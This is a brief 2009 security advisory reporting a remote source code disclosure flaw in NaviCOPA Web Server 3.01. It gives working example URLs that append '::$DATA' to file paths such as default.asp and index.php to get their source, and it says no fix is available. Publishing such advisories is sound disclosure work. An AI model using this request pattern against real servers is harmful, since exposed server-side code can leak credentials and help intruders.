NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability

2009-09-16 17:50:08

#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################

- Description -

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

http://[ webserver IP]/[ file ][::$DATA]

http://172.16.2.101/index.html::$DATA

http://172.16.2.101/default.asp::$DATA

http://172.16.2.101/index.php::$DATA

#

Fixes

No fixes

In order to submit a new fix you need to be registered.